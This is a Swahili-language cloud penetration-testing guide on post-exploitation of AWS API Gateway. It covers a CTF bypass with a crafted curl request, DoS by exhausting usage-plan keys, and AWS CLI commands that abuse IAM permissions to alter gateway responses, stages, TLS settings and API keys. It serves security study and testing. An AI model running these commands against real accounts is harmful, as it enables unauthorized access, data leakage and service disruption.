AWS - API Gateway Post Exploitation

API Gateway

Kwa maelezo zaidi angalia:

Kupata APIs ambazo hazijafichuliwa

Unaweza kuunda endpoint katika https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint na huduma com.amazonaws.us-east-1.execute-api, kufichua endpoint katika mtandao ambapo una ufikiaji (inawezekana kupitia mashine ya EC2) na kupeana kikundi cha usalama kinachoruhusu miunganisho yote. Kisha, kutoka kwa mashine ya EC2 utaweza kufikia endpoint na hivyo kupiga simu API ya gateway ambayo haikufichuliwa hapo awali.

Kuepuka Request body passthrough

Mbinu hii ilipatikana katika hii CTF writeup.

Kama ilivyoonyeshwa katika hati za AWS katika sehemu ya PassthroughBehavior, kwa default, thamani WHEN_NO_MATCH , wakati wa kuangalia kichwa cha Content-Type cha ombi, itapitisha ombi kwa back end bila mabadiliko.

Kwa hivyo, katika CTF API Gateway ilikuwa na template ya ujumuishaji ambayo ilikuwa ikizuia bendera kutoka kwa kuvuja katika jibu wakati ombi lilitumwa na Content-Type: application/json:

RequestTemplates:
application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'

Hata hivyo, kutuma ombi na Content-type: text/json kungezuia kichujio hicho.

Hatimaye, kwa kuwa API Gateway ilikuwa inaruhusu tu Get na Options, ilikuwa inawezekana kutuma swala lolote la dynamoDB bila kikomo kwa kutuma ombi la POST na swala kwenye mwili na kutumia kichwa X-HTTP-Method-Override: GET:

curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json'  --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}'

Usage Plans DoS

Katika sehemu ya Enumeration unaweza kuona jinsi ya kupata mpango wa matumizi ya funguo. Ikiwa una ufunguo na umewekewa kikomo cha matumizi X kwa mwezi, unaweza kuutumia tu na kusababisha DoS.

API Key inahitaji tu kujumuishwa ndani ya HTTP header inayoitwa x-api-key.

apigateway:UpdateGatewayResponse, apigateway:CreateDeployment

Mshambulizi mwenye ruhusa za apigateway:UpdateGatewayResponse na apigateway:CreateDeployment anaweza kubadilisha Jibu la Gateway lililopo ili kujumuisha vichwa vya kawaida au templates za majibu ambazo zinavuja taarifa nyeti au kutekeleza scripts mbaya.

API_ID="your-api-id"
RESPONSE_TYPE="DEFAULT_4XX"

# Update the Gateway Response
aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RESPONSE_TYPE --patch-operations op=replace,path=/responseTemplates/application~1json,value="{\"message\":\"$context.error.message\", \"malicious_header\":\"malicious_value\"}"

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Athari Zinazowezekana: Uvujaji wa taarifa nyeti, utekelezaji wa script mbaya, au ufikiaji usioidhinishwa wa rasilimali za API.

apigateway:UpdateStage, apigateway:CreateDeployment

Mshambuliaji mwenye ruhusa za apigateway:UpdateStage na apigateway:CreateDeployment anaweza kubadilisha hatua ya API Gateway iliyopo ili kuelekeza trafiki kwenye hatua tofauti au kubadilisha mipangilio ya kuhifadhi akiba ili kupata ufikiaji usioidhinishwa wa data iliyohifadhiwa.

API_ID="your-api-id"
STAGE_NAME="Prod"

# Update the API Gateway stage
aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --patch-operations op=replace,path=/cacheClusterEnabled,value=true,op=replace,path=/cacheClusterSize,value="0.5"

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Athari Zinazowezekana: Ufikiaji usioidhinishwa wa data iliyohifadhiwa, kuvuruga au kuingilia trafiki ya API.

apigateway:PutMethodResponse, apigateway:CreateDeployment

Mshambuliaji mwenye ruhusa za apigateway:PutMethodResponse na apigateway:CreateDeployment anaweza kubadilisha majibu ya njia ya API Gateway REST API iliyopo ili kujumuisha vichwa maalum au templates za majibu zinazovujisha taarifa nyeti au kutekeleza scripts za hatari.

API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
STATUS_CODE="200"

# Update the method response
aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --status-code $STATUS_CODE --response-parameters "method.response.header.malicious_header=true"

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potential Impact: Uvujaji wa taarifa nyeti, kutekeleza script mbaya, au kupata rasilimali za API bila ruhusa.

apigateway:UpdateRestApi, apigateway:CreateDeployment

Mshambuliaji mwenye ruhusa za apigateway:UpdateRestApi na apigateway:CreateDeployment anaweza kubadilisha mipangilio ya API Gateway REST API ili kuzima logging au kubadilisha toleo la chini la TLS, jambo ambalo linaweza kudhoofisha usalama wa API.

API_ID="your-api-id"

# Update the REST API settings
aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=replace,path=/minimumTlsVersion,value='TLS_1.0',op=replace,path=/apiKeySource,value='AUTHORIZER'

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Athari Zinazowezekana: Kudhoofisha usalama wa API, ikiruhusu upatikanaji usioidhinishwa au kufichua taarifa nyeti.

apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, apigateway:CreateUsagePlanKey

Mshambulizi mwenye ruhusa za apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, na apigateway:CreateUsagePlanKey anaweza kuunda funguo mpya za API, kuzihusisha na mipango ya matumizi, na kisha kutumia funguo hizi kwa upatikanaji usioidhinishwa wa APIs.

# Create a new API key
API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id')

# Create a new usage plan
USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --output text --query 'id')

# Associate the API key with the usage plan
aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY

Potential Impact: Ufikiaji usioidhinishwa wa rasilimali za API, kupita udhibiti wa usalama.